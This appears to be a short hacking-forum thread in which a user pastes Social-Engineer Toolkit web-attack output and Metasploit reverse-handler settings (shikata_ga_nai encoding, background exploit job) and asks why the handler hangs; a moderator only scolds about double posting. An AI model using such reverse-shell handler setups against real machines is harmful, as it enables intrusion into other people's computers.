Results 1 to 2 of 2

Thread: Starting the payload handler Help!!

  1. #1
    Just burned his ISO
    Join Date
    Oct 2009

    Default Starting the payload handler Help!!

    ************************************************** *
    Web Server Launched. Welcome to the SET Web Attack.
    ************************************************** *

    [--] Tested on IE6, IE7, IE8 and FireFox [--]

    Type <control>-c to exit.. - - [26/Oct/2009 05:11:59] "GET / HTTP/1.1" 200 -
    i get that in one of the window :P that shows my infected computer connect to the exploit i guess, but then i have this in my other window

    ENCODING => shikata_ga_nai
    resource> set ExitOnSession false
    ExitOnSession => false
    resource> exploit -j
    [*] Exploit running as Background job.
    msf exploit (handler) >
    [*] Handler Binding to LHOST
    [*] Started reverse handler
    [*] Starting the payload handler
    and it just fezzes there :P so what is the problem ? ^^ any ides ?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010


    Don't double post please. I have deleted the other thread you made on this subject.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts